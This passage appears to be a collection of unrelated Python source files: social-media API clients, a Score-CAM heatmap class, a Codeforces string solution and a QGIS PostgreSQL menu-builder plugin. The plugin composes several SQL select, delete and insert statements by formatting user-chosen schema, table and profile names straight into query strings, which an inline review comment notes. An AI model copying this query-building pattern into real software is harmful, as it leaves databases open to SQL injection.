        # Throttle AFTER the request (cf. Reddit/Twitter which wait before).
        time_diff = time() - self.last_request
        if time_diff < self.request_rate:
            sleep(self.request_rate - time_diff)
        self.last_request = time()

        if return_results:
            return req.json()

    def node_edge(self, node, edge, fields=None, params=None):
        """
        :param node: Graph node id whose edge is queried
        :param edge: edge name appended to the node path
        :param fields: optional list of field names (joined with commas)
        :param params: extra query parameters merged over the defaults
        :return: decoded JSON response
        """
        if fields:
            fields = ",".join(fields)

        parameters = {"fields": fields,
                      "access_token": self.key}

        parameters = self.merge_params(parameters, params)
        return self.api_call('%s/%s' % (node, edge), parameters)

    def post(self, post_id, fields=None, **params):
        """
        :param post_id: id of the post to fetch
        :param fields: optional list of field names (joined with commas)
        :param params: extra query parameters merged over the defaults
        :return: decoded JSON response
        """
        if fields:
            fields = ",".join(fields)

        parameters = {"fields": fields,
                      "access_token": self.key}

        parameters = self.merge_params(parameters, params)

        return self.api_call('%s' % post_id, parameters)

    def page_posts(self, page_id, after='', post_type="posts",
                   include_hidden=False, fields=None, **params):
        """
        :param page_id: id of the page whose posts are listed
        :param after: pagination cursor
        :param post_type: Can be 'posts', 'feed', 'tagged', 'promotable_posts'
        :param include_hidden: include posts the page has hidden
        :param fields: optional list of field names (joined with commas)
        :param params: extra query parameters merged over the defaults
        :return: decoded JSON response
        """
        if fields:
            fields = ",".join(fields)

        parameters = {"access_token": self.key,
                      "after": after,
                      "fields": fields,
                      "include_hidden": include_hidden}

        parameters = self.merge_params(parameters, params)

        return self.api_call('%s/%s' % (page_id, post_type), parameters)

    def post_comments(self, post_id, after='', order="chronological",
                      filter="stream", fields=None, **params):
        """
        :param post_id: id of the post whose comments are listed
        :param after: pagination cursor
        :param order: Can be 'ranked', 'chronological', 'reverse_chronological'
        :param filter: Can be 'stream', 'toplevel'
        :param fields: Can be 'id', 'application', 'attachment', 'can_comment',
        'can_remove', 'can_hide', 'can_like', 'can_reply_privately', 'comments',
        'comment_count', 'created_time', 'from', 'likes', 'like_count',
        'live_broadcast_timestamp', 'message', 'message_tags', 'object',
        'parent', 'private_reply_conversation', 'user_likes'
        :param params: extra query parameters merged over the defaults
        :return: decoded JSON response
        """
        if fields:
            fields = ",".join(fields)

        parameters = {"access_token": self.key,
                      "after": after,
                      "order": order,
                      "fields": fields,
                      "filter": filter}

        parameters = self.merge_params(parameters, params)

        return self.api_call('%s/comments' % post_id, parameters)
class Twitter(API):
    """Minimal Twitter v1.1 client using OAuth1 user-context auth."""

    def __init__(self, api_key, api_secret, access_token, access_token_secret):
        super().__init__()
        self.app_key = api_key
        self.app_secret = api_secret
        self.oauth_token = access_token
        self.oauth_token_secret = access_token_secret
        self.url = "https://api.twitter.com/1.1"
        self.request_rate = 5     # minimum seconds between calls
        self.auth = OAuth1(self.app_key, self.app_secret, self.oauth_token,
                           self.oauth_token_secret)
        self.last_request = time()

    def api_call(self, edge, parameters, return_results=True):
        """GET `edge` with OAuth1 signing, then throttle before the next call."""
        req = self.get("%s/%s" % (self.url, edge), params=parameters,
                       auth=self.auth)

        time_diff = time() - self.last_request
        if time_diff < self.request_rate:
            sleep(self.request_rate - time_diff)
        self.last_request = time()

        if return_results:
            return req.json()

    def search(self, query, count=100, max_id='',
               result_type="mixed", include_entities=True,
               tweet_mode='extended', **params):
        """Tweet search; `max_id` paginates backwards through results."""
        # NOTE(review): this raises smaller counts up to 100 (a floor, not a
        # cap) -- confirm that is intended.
        count = 100 if count < 100 else count
        parameters = {"q": query,
                      "count": count,
                      "max_id": max_id,
                      "result_type": result_type,
                      "include_entities": include_entities,
                      "tweet_mode": tweet_mode}

        parameters = self.merge_params(parameters, params)
        return self.api_call("search/tweets.json", parameters)

    def user(self, username, count=200, max_id=None, exclude_replies=False,
             include_retweets=False, tweet_mode='extended', **params):
        """A user's timeline; `max_id` paginates backwards through tweets."""
        parameters = {"screen_name": username,
                      "count": count,
                      "max_id": max_id,
                      "exclude_replies": exclude_replies,
                      "include_rts": include_retweets,
                      "tweet_mode": tweet_mode}

        parameters = self.merge_params(parameters, params)
        return self.api_call("statuses/user_timeline.json", parameters)
19786182992 | from keras import Model
import numpy as np
from scam.exceptions import InvalidState
from scam.utils import resize_activations, normalize_activations
class ScoreCAM:
    """Score-CAM: class activation maps obtained by re-scoring the input
    masked with each (normalized, upsampled) activation map of the last
    convolutional layer, instead of using gradients."""
    def __init__(self, model_input, last_conv_output, softmax_output, input_shape, cam_batch_size=None):
        """
        Prepares class activation mappings
        :param model_input: input layer of CNN, normally takes batch of images as an input. Currently batch must be limited to a single image
        :param last_conv_output: last convolutional layer. The last conv layer contains the most complete information about image.
        :param softmax_output: flat softmax (or similar) layer describing the class certainty
        :param input_shape: Expecting a batch of a single input sample 1 x M X N X ...; it is assumed that 2D image of M x N dimensions is served as an input, which can be multiplied with a 2D-mask.
        :param cam_batch_size: Optional, defaults to None, which will result in inference of batches of size 32.
        """
        self.model_input = model_input
        self.last_conv_output = last_conv_output
        self.softmax_output = softmax_output
        # sub-model producing the last conv feature maps for an input image
        self.last_conv_model = Model(inputs=model_input, outputs=last_conv_output)
        # sub-model producing the class scores for an input image
        self.softmax_model = Model(inputs=model_input, outputs=softmax_output)
        self.input_shape = input_shape
        self.cam_batch_size = cam_batch_size
        # populated by prepare_cam(); None until then
        self.normalized_maps = None
        self.classes_activation_scale = None
    def prepare_cam(self, input):
        """Run both sub-models and cache the per-filter activation maps and
        the class scores of the correspondingly masked inputs."""
        output_conv = self.last_conv_model.predict(input)
        # Only first image from convolutions will be used
        resized = resize_activations(output_conv[0], self.input_shape)
        # filter_size x input_shape[0] x input_shape[1] - resized to original input dimensions
        normalized_maps = normalize_activations(resized)
        # repeat input once per filter so each copy can be masked by one map
        repeat_input = np.tile(input, (normalized_maps.shape[0], 1, 1, 1))
        expanded_activation_maps = np.expand_dims(normalized_maps, axis=3)
        # element-wise masking of each input copy with its activation map
        masked_images = np.multiply(repeat_input, expanded_activation_maps)
        # input: filter_size x input_shape[0] x input_shape[1] -> Output filter_size x Classes_Count
        self.classes_activation_scale = self.softmax_model.predict(masked_images,
                                                                   batch_size=self.cam_batch_size)
        self.normalized_maps = normalized_maps
    def get_class_heatmap(self, class_id):
        """Return the heatmap for ``class_id``: activation maps weighted by
        the masked-input class scores, max-combined across filters, ReLU'd.

        Raises InvalidState when prepare_cam() has not been called first.
        """
        if self.normalized_maps is None or self.classes_activation_scale is None:
            raise InvalidState('Call prepare_cam before accessing get_class_heatmap, '
                               'activations must be prepared via prepare_cam')
        # one weight per filter: the score of class_id on the masked input
        final_weights = self.classes_activation_scale[:, class_id]
        final_maps = np.multiply(self.normalized_maps, final_weights.reshape((-1, 1, 1)))
        # ReLU
        final_maps_max = np.max(final_maps, axis=0)
        final_class_activation_map = np.where(final_maps_max > 0, final_maps_max, 0)
        return final_class_activation_map
74331703784 | '''
https://codeforces.com/problemset/problem/126/B
Solution: Compute array z as Z function of the string. Then we just need to find
an element z[i] such that z[i]=n-i and z[i]<max(z) or z[i]==max(z) and count(z[i])>=2
'''
def Z(s):
    """Compute the Z-function of ``s`` in O(n).

    z[i] is the length of the longest common prefix of ``s`` and ``s[i:]``
    (by convention z[0] is left at 0).  Maintains the rightmost match
    window [left, right] to reuse previously computed values.
    """
    n = len(s)
    z = [0] * n
    left = right = 0
    for i in range(1, n):
        if i <= right:
            # position i lies inside the current match window: reuse the
            # mirrored value when it stays strictly inside the window
            mirror = z[i - left]
            if mirror < right - i + 1:
                z[i] = mirror
                continue
        # otherwise extend the match at i by direct character comparison
        left = i
        if right < i:
            right = i
        while right < n and s[right - left] == s[right]:
            right += 1
        z[i] = right - left
        right -= 1
    return z
# Find the longest proper prefix of s that is also a suffix of s AND occurs
# somewhere else inside s; print it, or "Just a legend" when none exists.
s=input()
n=len(s)
z=Z(s)
m=max(z)
# best candidate length found so far (-inf means "none yet")
e=-float("inf")
# count[v] = how many positions with z value v have been processed so far
count={i:0 for i in z}
for i in range(1,n):
    if z[i]==n-i:
        # the suffix starting at i equals the prefix of the same length;
        # accept it when a larger z value exists elsewhere, or the same
        # (maximal) z value already occurred at an earlier position
        if z[i]<m or (z[i]==m and count[z[i]]>0):
            e=max(z[i],e)
    count[z[i]]+=1
if e!=-float("inf"):
    print(s[-e:])
else:
    print("Just a legend")
23971685802 | from __future__ import unicode_literals
import os
import re
import json
from contextlib import contextmanager
from collections import defaultdict
from functools import wraps, partial
import psycopg2
from PyQt4.QtCore import Qt, QSettings, QRect
from PyQt4.QtGui import (
QIcon, QMessageBox, QDialog, QStandardItem, QMenu, QAction,
QStandardItemModel, QTreeView, QAbstractItemView,
QDockWidget, QWidget, QVBoxLayout, QSizePolicy,
QSortFilterProxyModel, QLineEdit, QDialogButtonBox
)
from qgis.core import (
QgsMapLayerRegistry, QgsBrowserModel, QgsDataSourceURI,
QgsCredentials, QgsVectorLayer, QgsMimeDataUtils, QgsRasterLayer
)
from menu_builder_dialog_base import Ui_Dialog
# MIME type QGIS uses when serializing layer URIs for drag & drop
QGIS_MIMETYPE = 'application/x-vnd.qgis.qgis.uri'
# maps a QGIS data-provider key to the icon shown next to layer entries
ICON_MAPPER = {
    'postgres': ":/plugins/MenuBuilder/resources/postgis.svg",
    'WMS': ":/plugins/MenuBuilder/resources/wms.svg",
    'WFS': ":/plugins/MenuBuilder/resources/wfs.svg",
    'OWS': ":/plugins/MenuBuilder/resources/ows.svg",
    'spatialite': ":/plugins/MenuBuilder/resources/spatialite.svg",
    'mssql': ":/plugins/MenuBuilder/resources/mssql.svg",
    'gdal': ":/plugins/MenuBuilder/resources/gdal.svg",
    'ogr': ":/plugins/MenuBuilder/resources/ogr.svg",
}
class MenuBuilderDialog(QDialog, Ui_Dialog):
    """Configuration dialog of the Menu Builder QGIS plugin.

    Lets the user drag layers from the QGIS browser into a tree of menus,
    persists that tree per-profile in a PostgreSQL table
    (``qgis_menubuilder_metadata``), and can expose the result either as a
    dock widget or as entries in the QGIS main menu bar.
    """
    def __init__(self, uiparent):
        """Build the dialog widgets and wire the signals.

        :param uiparent: the plugin object; provides ``iface`` and the list
            of menus currently installed in the QGIS menu bar (``menus``).
        """
        super(MenuBuilderDialog, self).__init__()
        self.setupUi(self)
        # reference to caller
        self.uiparent = uiparent
        self.combo_profile.lineEdit().setPlaceholderText(self.tr("Profile name"))
        # add icons
        self.button_add_menu.setIcon(QIcon(":/plugins/MenuBuilder/resources/plus.svg"))
        self.button_delete_profile.setIcon(QIcon(":/plugins/MenuBuilder/resources/delete.svg"))
        # custom qtreeview: drop target where the menu tree is edited
        self.target = CustomQtTreeView(self)
        self.target.setGeometry(QRect(440, 150, 371, 451))
        self.target.setAcceptDrops(True)
        self.target.setDragEnabled(True)
        self.target.setDragDropMode(QAbstractItemView.DragDrop)
        self.target.setObjectName("target")
        self.target.setDropIndicatorShown(True)
        self.target.setSelectionMode(QAbstractItemView.ExtendedSelection)
        self.target.setHeaderHidden(True)
        sizePolicy = QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.target.sizePolicy().hasHeightForWidth())
        self.target.setSizePolicy(sizePolicy)
        self.target.setAutoFillBackground(True)
        self.verticalLayout_2.addWidget(self.target)
        # left-hand side: the standard QGIS browser, drag source
        self.browser = QgsBrowserModel()
        self.source.setModel(self.browser)
        self.source.setHeaderHidden(True)
        self.source.setDragEnabled(True)
        self.source.setSelectionMode(QAbstractItemView.ExtendedSelection)
        self.menumodel = MenuTreeModel(self)
        self.target.setModel(self.menumodel)
        self.target.setAnimated(True)
        # add a dock widget (read-only view of the saved menu tree)
        self.dock_widget = QDockWidget("Menus")
        self.dock_widget.resize(400, 300)
        self.dock_widget.setFloating(True)
        self.dock_widget.setObjectName(self.tr("Menu Tree"))
        self.dock_widget_content = QWidget()
        self.dock_widget.setWidget(self.dock_widget_content)
        dock_layout = QVBoxLayout()
        self.dock_widget_content.setLayout(dock_layout)
        self.dock_view = DockQtTreeView(self.dock_widget_content)
        self.dock_view.setDragDropMode(QAbstractItemView.DragOnly)
        self.dock_menu_filter = QLineEdit()
        self.dock_menu_filter.setPlaceholderText(self.tr("Filter by table description (postgis only)"))
        dock_layout.addWidget(self.dock_menu_filter)
        dock_layout.addWidget(self.dock_view)
        self.dock_view.setHeaderHidden(True)
        self.dock_view.setDragEnabled(True)
        self.dock_view.setSelectionMode(QAbstractItemView.ExtendedSelection)
        self.dock_view.setAnimated(True)
        self.dock_view.setObjectName("treeView")
        # filtering proxy: matches on tooltips (postgres table comments)
        self.proxy_model = LeafFilterProxyModel(self)
        self.proxy_model.setFilterRole(Qt.ToolTipRole)
        self.proxy_model.setFilterCaseSensitivity(Qt.CaseInsensitive)
        self.profile_list = []
        # name of the metadata table holding saved profiles
        self.table = 'qgis_menubuilder_metadata'
        # dispatch table: QGIS layer type -> loader slot
        self.layer_handler = {
            'vector': self.load_vector,
            'raster': self.load_raster
        }
        # connect signals and handlers
        self.combo_database.activated.connect(partial(self.set_connection, dbname=None))
        self.combo_schema.activated.connect(self.update_profile_list)
        self.combo_profile.activated.connect(partial(self.update_model_idx, self.menumodel))
        self.button_add_menu.released.connect(self.add_menu)
        self.button_delete_profile.released.connect(self.delete_profile)
        self.dock_menu_filter.textEdited.connect(self.filter_update)
        self.dock_view.doubleClicked.connect(self.load_from_index)
        self.buttonBox.rejected.connect(self.reject)
        self.buttonBox.accepted.connect(self.accept)
        self.buttonBox.button(QDialogButtonBox.Apply).clicked.connect(self.apply)
    def filter_update(self):
        """Re-apply the dock filter with the text currently typed."""
        text = self.dock_menu_filter.displayText()
        self.proxy_model.setFilterRegExp(text)
    def show_dock(self, state, profile=None, schema=None):
        """Show or hide the dock widget, rebuilding its model when shown.

        :param state: truthy to show the dock, falsy to hide it
        :param profile: optional profile name (bypasses the combobox)
        :param schema: schema holding the profile (used with ``profile``)
        """
        if not state:
            # just hide widget
            self.dock_widget.setVisible(state)
            return
        # dock must be read only and deepcopy of model is not supported (c++ inside!)
        self.dock_model = MenuTreeModel(self)
        if profile:
            # bypass combobox
            self.update_model(self.dock_model, schema, profile)
        else:
            self.update_model_idx(self.dock_model, self.combo_profile.currentIndex())
        self.dock_model.setHorizontalHeaderLabels(["Menus"])
        self.dock_view.setEditTriggers(QAbstractItemView.NoEditTriggers)
        self.proxy_model.setSourceModel(self.dock_model)
        self.dock_view.setModel(self.proxy_model)
        self.dock_widget.setVisible(state)
    def show_menus(self, state, profile=None, schema=None):
        """Install (state truthy) or remove (falsy) the profile's menus in
        the QGIS main menu bar."""
        if state:
            self.load_menus(profile=profile, schema=schema)
            return
        # remove menus
        for menu in self.uiparent.menus:
            self.uiparent.iface.mainWindow().menuBar().removeAction(menu.menuAction())
    def add_menu(self):
        """
        Add a menu inside qtreeview
        """
        item = QStandardItem('NewMenu')
        item.setIcon(QIcon(':/plugins/MenuBuilder/resources/menu.svg'))
        # select current index selected and insert as a sibling
        brother = self.target.selectedIndexes()
        if not brother or not brother[0].parent():
            # no selection, add menu at the top level
            self.menumodel.insertRow(self.menumodel.rowCount(), item)
            return
        parent = self.menumodel.itemFromIndex(brother[0].parent())
        if not parent:
            self.menumodel.insertRow(self.menumodel.rowCount(), item)
            return
        parent.appendRow(item)
    def update_database_list(self):
        """update list of defined postgres connections"""
        settings = QSettings()
        settings.beginGroup("/PostgreSQL/connections")
        keys = settings.childGroups()
        self.combo_database.clear()
        self.combo_schema.clear()
        self.menumodel.clear()
        self.combo_database.addItems(keys)
        self.combo_database.setCurrentIndex(-1)
        settings.endGroup()
        # clear profile list
        self.combo_profile.clear()
        self.combo_profile.setCurrentIndex(-1)
    def set_connection(self, databaseidx, dbname=None):
        """
        Connect to selected postgresql database

        :param databaseidx: index of the connection in the database combobox
        :param dbname: optional connection name, used instead of the combobox
            entry (e.g. when restoring a previous session)
        """
        selected = self.combo_database.itemText(databaseidx) or dbname
        if not selected:
            return
        settings = QSettings()
        settings.beginGroup("/PostgreSQL/connections/{}".format(selected))
        if not settings.contains("database"):
            # no entry?
            QMessageBox.critical(self, "Error", "There is no defined database connection")
            return
        uri = QgsDataSourceURI()
        settingsList = ["service", "host", "port", "database", "username", "password"]
        service, host, port, database, username, password = map(
            lambda x: settings.value(x, "", type=str), settingsList)
        useEstimatedMetadata = settings.value("estimatedMetadata", False, type=bool)
        sslmode = settings.value("sslmode", QgsDataSourceURI.SSLprefer, type=int)
        settings.endGroup()
        # a pg service definition takes precedence over host/port
        if service:
            uri.setConnection(service, database, username, password, sslmode)
        else:
            uri.setConnection(host, port, database, username, password, sslmode)
        uri.setUseEstimatedMetadata(useEstimatedMetadata)
        # connect to db
        self.connect_to_uri(uri)
        # update schema list
        self.update_schema_list()
    @contextmanager
    def transaction(self):
        """Context manager committing on success and rolling back (then
        re-raising) on any psycopg2 error."""
        try:
            yield
            self.connection.commit()
        except self.pg_error_types() as e:
            self.connection.rollback()
            raise e
    def check_connected(func):
        """
        Decorator that checks if a database connection is active before executing function
        """
        @wraps(func)
        def wrapped(inst, *args, **kwargs):
            if not getattr(inst, 'connection', False):
                QMessageBox(
                    QMessageBox.Warning,
                    "Menu Builder",
                    inst.tr("Not connected to any database, please select one"),
                    QMessageBox.Ok,
                    inst
                ).exec_()
                return
            if inst.connection.closed:
                QMessageBox(
                    QMessageBox.Warning,
                    "Menu Builder",
                    inst.tr("Not connected to any database, please select one"),
                    QMessageBox.Ok,
                    inst
                ).exec_()
                return
            return func(inst, *args, **kwargs)
        return wrapped
    def connect_to_uri(self, uri):
        """Open a psycopg2 connection for ``uri``, prompting for missing
        credentials via QgsCredentials; returns True on success."""
        self.close_connection()
        self.host = uri.host() or os.environ.get('PGHOST')
        self.port = uri.port() or os.environ.get('PGPORT')
        username = uri.username() or os.environ.get('PGUSER') or os.environ.get('USER')
        password = uri.password() or os.environ.get('PGPASSWORD')
        try:
            self.connection = psycopg2.connect(uri.connectionInfo())
        except self.pg_error_types() as e:
            # first attempt failed: ask the user for credentials and retry
            err = str(e)
            conninfo = uri.connectionInfo()
            ok, username, password = QgsCredentials.instance().get(
                conninfo, username, password, err)
            if not ok:
                raise Exception(e)
            if username:
                uri.setUsername(username)
            if password:
                uri.setPassword(password)
            self.connection = psycopg2.connect(uri.connectionInfo())
        self.pgencoding = self.connection.encoding
        return True
    def pg_error_types(self):
        """Tuple of psycopg2 exception types treated as connection/SQL errors."""
        return (
            psycopg2.InterfaceError,
            psycopg2.OperationalError,
            psycopg2.ProgrammingError
        )
    @check_connected
    def update_schema_list(self):
        """Fill the schema combobox with the database's non-system schemas."""
        self.combo_schema.clear()
        with self.transaction():
            cur = self.connection.cursor()
            cur.execute("""
                select nspname
                from pg_namespace
                where nspname not ilike 'pg_%'
                and nspname not in ('pg_catalog', 'information_schema')
                """)
            schemas = [row[0] for row in cur.fetchall()]
            self.combo_schema.addItems(schemas)
    @check_connected
    def update_profile_list(self, schemaidx):
        """
        update profile list from database

        Offers to create the metadata table when it does not exist yet in
        the selected schema; returns False in that case.
        """
        schema = self.combo_schema.itemText(schemaidx)
        with self.transaction():
            cur = self.connection.cursor()
            # NOTE(review): schema/table names are interpolated into SQL
            # throughout this class; values come from the UI, consider
            # quoting/parameterizing to be safe.
            cur.execute("""
                select 1
                from pg_tables
                where schemaname = '{0}'
                and tablename = '{1}'
                union
                select 1
                from pg_matviews
                where schemaname = '{0}'
                and matviewname = '{1}'
                """.format(schema, self.table))
            tables = cur.fetchone()
            if not tables:
                box = QMessageBox(
                    QMessageBox.Warning,
                    "Menu Builder",
                    self.tr("Table '{}.{}' not found in this database, "
                            "would you like to create it now ?")
                        .format(schema, self.table),
                    QMessageBox.Cancel | QMessageBox.Yes,
                    self
                )
                ret = box.exec_()
                if ret == QMessageBox.Cancel:
                    return False
                elif ret == QMessageBox.Yes:
                    cur.execute("""
                        create table {}.{} (
                            id serial,
                            name varchar,
                            profile varchar,
                            model_index varchar,
                            datasource_uri text
                        )
                        """.format(schema, self.table))
                    self.connection.commit()
                    return False
            cur.execute("""
                select distinct(profile) from {}.{}
                """.format(schema, self.table))
            profiles = [row[0] for row in cur.fetchall()]
            # refill the combobox, keeping the previous selection if possible
            saved_profile = self.combo_profile.currentText()
            self.combo_profile.clear()
            self.combo_profile.addItems(profiles)
            self.combo_profile.setCurrentIndex(self.combo_profile.findText(saved_profile))
    @check_connected
    def delete_profile(self):
        """
        Delete profile currently selected
        """
        idx = self.combo_profile.currentIndex()
        schema = self.combo_schema.currentText()
        profile = self.combo_profile.itemText(idx)
        box = QMessageBox(
            QMessageBox.Warning,
            "Menu Builder",
            self.tr("Delete '{}' profile ?").format(profile),
            QMessageBox.Cancel | QMessageBox.Yes,
            self
        )
        ret = box.exec_()
        if ret == QMessageBox.Cancel:
            return False
        elif ret == QMessageBox.Yes:
            self.combo_profile.removeItem(idx)
            with self.transaction():
                cur = self.connection.cursor()
                cur.execute("""
                    delete from {}.{}
                    where profile = '{}'
                    """.format(schema, self.table, profile))
            self.menumodel.clear()
            self.combo_profile.setCurrentIndex(-1)
    def update_model_idx(self, model, profile_index):
        """
        wrapper that checks combobox

        Resolves ``profile_index`` to a profile name and delegates to
        :meth:`update_model`.
        """
        profile = self.combo_profile.itemText(profile_index)
        schema = self.combo_schema.currentText()
        self.update_model(model, schema, profile)
    def sortby_modelindex(self, rows):
        """Sort db rows by their serialized model index (third column) so
        menus are rebuilt in their saved order; each index component is
        zero-padded to 4 digits for lexicographic comparison."""
        return sorted(
            rows,
            key=lambda line: '/'.join(
                ['{:04}'.format(elem[0]) for elem in json.loads(line[2])]
            ))
    @check_connected
    def update_model(self, model, schema, profile):
        """
        Update the model by retrieving the profile given in database
        """
        # maps accumulated path ("0-menu/1-submenu/") -> QStandardItem
        menudict = {}
        with self.transaction():
            cur = self.connection.cursor()
            select = """
                select name, profile, model_index, datasource_uri
                from {}.{}
                where profile = '{}'
                """.format(schema, self.table, profile)
            cur.execute(select)
            rows = cur.fetchall()
        model.clear()
        for name, profile, model_index, datasource_uri in self.sortby_modelindex(rows):
            menu = model.invisibleRootItem()
            indexes = json.loads(model_index)
            parent = ''
            # all components but the last are menus; the last is the layer
            for idx, subname in indexes[:-1]:
                parent += '{}-{}/'.format(idx, subname)
                if parent in menudict:
                    # already created entry
                    menu = menudict[parent]
                    continue
                # create menu
                item = QStandardItem(subname)
                uri_struct = QgsMimeDataUtils.Uri(datasource_uri)
                item.setData(uri_struct)
                item.setIcon(QIcon(':/plugins/MenuBuilder/resources/menu.svg'))
                item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsUserCheckable |
                              Qt.ItemIsEnabled | Qt.ItemIsDropEnabled |
                              Qt.ItemIsEditable)
                item.setWhatsThis("menu")
                menu.appendRow(item)
                menudict[parent] = item
                # set current menu to the new created item
                menu = item
            # add leaf (layer item)
            item = QStandardItem(name)
            uri_struct = QgsMimeDataUtils.Uri(datasource_uri)
            # fix layer name instead of table name
            # usefull when the layer has been renamed in menu
            uri_struct.name = name
            if uri_struct.providerKey in ICON_MAPPER:
                item.setIcon(QIcon(ICON_MAPPER[uri_struct.providerKey]))
            item.setData(uri_struct)
            # avoid placing dragged layers on it
            item.setDropEnabled(False)
            if uri_struct.providerKey == 'postgres':
                # set tooltip to postgres comment
                comment = self.get_table_comment(uri_struct.uri)
                item.setToolTip(comment)
            menudict[parent].appendRow(item)
    @check_connected
    def save_changes(self, save_to_db=True):
        """
        Save changes in the postgres table

        When ``save_to_db`` is False only the session settings and the
        dock/menubar display are refreshed. Returns True on success.
        """
        schema = self.combo_schema.currentText()
        profile = self.combo_profile.currentText()
        if not profile:
            QMessageBox(
                QMessageBox.Warning,
                "Menu Builder",
                self.tr("Profile cannot be empty"),
                QMessageBox.Ok,
                self
            ).exec_()
            return False
        if save_to_db:
            try:
                with self.transaction():
                    cur = self.connection.cursor()
                    # replace the whole profile: delete then re-insert
                    cur.execute("delete from {}.{} where profile = '{}'".format(
                        schema, self.table, profile))
                    for item, data in self.target.iteritems():
                        if not data:
                            continue
                        cur.execute("""
                            insert into {}.{} (name,profile,model_index,datasource_uri)
                            values (%s, %s, %s, %s)
                            """.format(schema, self.table), (
                            item[-1][1],
                            profile,
                            json.dumps(item),
                            data.data())
                        )
            except Exception as exc:
                QMessageBox(
                    QMessageBox.Warning,
                    "Menu Builder",
                    exc.message.decode(self.pgencoding),
                    QMessageBox.Ok,
                    self
                ).exec_()
                return False
        self.save_session(
            self.combo_database.currentText(),
            schema,
            profile,
            self.activate_dock.isChecked(),
            self.activate_menubar.isChecked()
        )
        self.update_profile_list(self.combo_schema.currentIndex())
        self.show_dock(self.activate_dock.isChecked())
        self.show_menus(self.activate_menubar.isChecked())
        return True
    @check_connected
    def load_menus(self, profile=None, schema=None):
        """
        Load menus in the main windows qgis bar
        """
        if not schema:
            schema = self.combo_schema.currentText()
        if not profile:
            profile = self.combo_profile.currentText()
        # remove previous menus
        for menu in self.uiparent.menus:
            self.uiparent.iface.mainWindow().menuBar().removeAction(menu.menuAction())
        with self.transaction():
            cur = self.connection.cursor()
            select = """
                select name, profile, model_index, datasource_uri
                from {}.{}
                where profile = '{}'
                """.format(schema, self.table, profile)
            cur.execute(select)
            rows = cur.fetchall()
        # item accessor ex: '0-menu/0-submenu/1-item/'
        menudict = {}
        # reference to parent item
        parent = ''
        # reference to qgis main menu bar
        menubar = self.uiparent.iface.mainWindow().menuBar()
        for name, profile, model_index, datasource_uri in self.sortby_modelindex(rows):
            uri_struct = QgsMimeDataUtils.Uri(datasource_uri)
            indexes = json.loads(model_index)
            # root menu
            parent = '{}-{}/'.format(indexes[0][0], indexes[0][1])
            if parent not in menudict:
                menu = QMenu(self.uiparent.iface.mainWindow())
                self.uiparent.menus.append(menu)
                menu.setObjectName(indexes[0][1])
                menu.setTitle(indexes[0][1])
                # insert just before the first QGIS right-hand standard menu
                menubar.insertMenu(
                    self.uiparent.iface.firstRightStandardMenu().menuAction(),
                    menu)
                menudict[parent] = menu
            else:
                # menu already there
                menu = menudict[parent]
            for idx, subname in indexes[1:-1]:
                # intermediate submenus
                parent += '{}-{}/'.format(idx, subname)
                if parent not in menudict:
                    submenu = menu.addMenu(subname)
                    submenu.setObjectName(subname)
                    submenu.setTitle(subname)
                    menu = submenu
                    # store it for later use
                    menudict[parent] = menu
                    continue
                # already treated
                menu = menudict[parent]
            # last item = layer
            layer = QAction(name, self.uiparent.iface.mainWindow())
            if uri_struct.providerKey in ICON_MAPPER:
                layer.setIcon(QIcon(ICON_MAPPER[uri_struct.providerKey]))
            if uri_struct.providerKey == 'postgres':
                # set tooltip to postgres comment
                comment = self.get_table_comment(uri_struct.uri)
                layer.setStatusTip(comment)
                layer.setToolTip(comment)
            layer.setData(uri_struct.uri)
            layer.setWhatsThis(uri_struct.providerKey)
            # dispatch to load_vector / load_raster depending on layer type
            layer.triggered.connect(self.layer_handler[uri_struct.layerType])
            menu.addAction(layer)
    def get_table_comment(self, uri):
        """Return the pg_description comment of the table referenced in a
        postgres datasource ``uri`` ('' when none)."""
        # extract schema and table from the 'table="schema"."name"' fragment
        schema, table = re.match(r'.*table=(".*"\.".*")', uri) \
            .group(1) \
            .strip() \
            .replace('"', '') \
            .split('.')
        with self.transaction():
            cur = self.connection.cursor()
            select = """
                select description from pg_description
                join pg_class on pg_description.objoid = pg_class.oid
                join pg_namespace on pg_class.relnamespace = pg_namespace.oid
                where relname = '{}' and nspname='{}'
                """.format(table, schema)
            cur.execute(select)
            row = cur.fetchone()
            if row:
                return row[0]
            return ''
    def load_from_index(self, index):
        """Load layers from selected item index"""
        item = self.dock_model.itemFromIndex(self.proxy_model.mapToSource(index))
        if item.whatsThis() == 'menu':
            return
        if item.data().layerType == 'vector':
            layer = QgsVectorLayer(
                item.data().uri,  # uri
                item.text(),  # layer name
                item.data().providerKey  # provider name
            )
        elif item.data().layerType == 'raster':
            layer = QgsRasterLayer(
                item.data().uri,  # uri
                item.text(),  # layer name
                item.data().providerKey  # provider name
            )
        if not layer:
            return
        QgsMapLayerRegistry.instance().addMapLayer(layer)
    def load_vector(self):
        """Slot for a vector-layer QAction: add it to the QGIS registry."""
        action = self.sender()
        layer = QgsVectorLayer(
            action.data(),  # uri
            action.text(),  # layer name
            action.whatsThis()  # provider name
        )
        QgsMapLayerRegistry.instance().addMapLayer(layer)
    def load_raster(self):
        """Slot for a raster-layer QAction: add it to the QGIS registry."""
        action = self.sender()
        layer = QgsRasterLayer(
            action.data(),  # uri
            action.text(),  # layer name
            action.whatsThis()  # provider name
        )
        QgsMapLayerRegistry.instance().addMapLayer(layer)
    def accept(self):
        """OK button: save to db, then close the dialog and the connection."""
        if self.save_changes():
            QDialog.reject(self)
        self.close_connection()
    def apply(self):
        """Apply button: refresh display/session without writing to db."""
        # NOTE(review): this closes the dialog via reject(); an Apply button
        # usually keeps the dialog open -- confirm this is intended.
        if self.save_changes(save_to_db=False):
            QDialog.reject(self)
    def reject(self):
        """Cancel button: close the connection and dismiss the dialog."""
        self.close_connection()
        QDialog.reject(self)
    def close_connection(self):
        """close current pg connection if exists"""
        if getattr(self, 'connection', False):
            if self.connection.closed:
                return
            self.connection.close()
    def save_session(self, database, schema, profile, dock, menubar):
        """save current profile for next session"""
        settings = QSettings()
        settings.setValue("MenuBuilder/database", database)
        settings.setValue("MenuBuilder/schema", schema)
        settings.setValue("MenuBuilder/profile", profile)
        settings.setValue("MenuBuilder/dock", dock)
        settings.setValue("MenuBuilder/menubar", menubar)
    def restore_session(self):
        """Reconnect and redisplay the dock/menus saved by save_session()."""
        settings = QSettings()
        database = settings.value("MenuBuilder/database", False)
        schema = settings.value("MenuBuilder/schema", 'public')
